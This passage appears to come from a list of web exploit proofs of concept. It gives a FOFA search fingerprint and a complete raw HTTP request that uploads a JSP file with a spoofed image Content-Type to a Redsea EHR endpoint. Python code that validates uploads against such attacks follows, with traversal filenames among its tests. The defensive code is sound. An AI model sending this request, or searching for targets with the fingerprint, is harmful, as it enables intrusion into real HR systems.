Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA: body="RedseaPlatform"
The fj_file part is stored under its client-supplied name, so a .jsp uploaded with a spoofed image/jpeg Content-Type is accepted. Content-Length 210 is correct for the body below with CRLF line endings.

POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
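Every upload entry in this batch (192, 194, 199, 202 and 203) gets through for one of three reasons: the client-supplied file name is used as-is (the ../ in 194), the extension check is missing or trusts the attacker's Content-Type (the .php in 199, the .jsp labelled image/jpeg in 203, the bare .ashx name in 192), or the endpoint needs no valid session at all. The Python below is an added example of the server-side checks that close the first two, written for this page rather than taken from any of the products: it rejects traversal, refuses executable extensions anywhere in the name, validates content against the extension's magic bytes instead of the declared Content-Type, and never stores under the attacker's name. Authentication for the endpoint is assumed to be handled elsewhere; the sample filenames in the main block are the ones from this page plus one constructed JPEG header.

```python
"""Server-side upload validation that would have stopped the uploads in entries 192, 194, 199, 202 and 203.

Added example for this collection, not code from any of the affected products.
"""
import secrets
from typing import Tuple

# Anything the web tier would execute; checked against every dotted segment, so
# "shell.php.jpg" is rejected as well as plain "tttt.php".
EXECUTABLE_EXT = {"php", "phtml", "php3", "php5", "jsp", "jspx", "jsw", "jsv",
                  "asp", "aspx", "ashx", "asmx", "cer", "war", "sh", "cgi"}
# Allow-list of what this endpoint exists to accept; everything else is refused.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "pdf"}
# Leading bytes a genuine file of that type must carry. The declared Content-Type
# is attacker-controlled (entry 203 labels a JSP as image/jpeg) and is ignored.
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
         "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8", "pdf": b"%PDF-"}


def check_upload(filename: str, head: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). `head` is the first bytes of the uploaded content."""
    name = filename.replace("\\", "/").strip()
    # Entry 194: "../../../../../jboss/web/fe.war/hello.jsp" must never reach the filesystem.
    if "/" in name or "\x00" in name or name in ("", ".", ".."):
        return False, "path separator, NUL or traversal in filename"
    segments = name.lower().split(".")
    # Entry 192: name=.ashx has an empty base name and nothing but an executable suffix.
    if len(segments) < 2 or segments[0] == "":
        return False, "missing base name or extension"
    exts = [s.strip() for s in segments[1:]]
    # Entries 199 and 203: tttt.php and 11.jsp are executable whatever Content-Type claims.
    if any(e in EXECUTABLE_EXT for e in exts):
        return False, "executable extension"
    ext = exts[-1]
    if ext not in ALLOWED_EXT:
        return False, "extension not in allow-list"
    magic = MAGIC.get(ext)
    if magic and not head.startswith(magic):
        return False, "content does not match extension"
    return True, "ok"


def storage_name(filename: str) -> str:
    """Name to store an accepted upload under: random stem plus the validated extension.

    The client name never reaches disk, so neither its directory components nor
    its choice of stem can influence where the file lands or how it is served.
    """
    ext = filename.lower().rsplit(".", 1)[1].strip()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed samples: the filenames from this page plus one legitimate JPEG header.
    for fname, head in [
        ("../../../../../jboss/web/fe.war/hello.jsp", b"<% out.println"),
        (".ashx", b"<%@ WebHandler"),
        ("tttt.php", b"<?php echo"),
        ("11.jsp", b"<% out.print"),
        ("1123.aspx", b"<%@ Page"),
        ("shell.jpg", b"<?php echo"),
        ("photo.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF"),
    ]:
        ok, why = check_upload(fname, head)
        print(f"{fname!r:45} {'ACCEPT' if ok else 'REJECT'} ({why})")
```

Run the checks on the first chunk of the stream before anything is written, and keep the upload directory outside any path the application server will execute from; the allow-list and the random storage name then make the remaining entries on this list (the .txt in 202 included, which would fail the allow-list) uninteresting to an attacker.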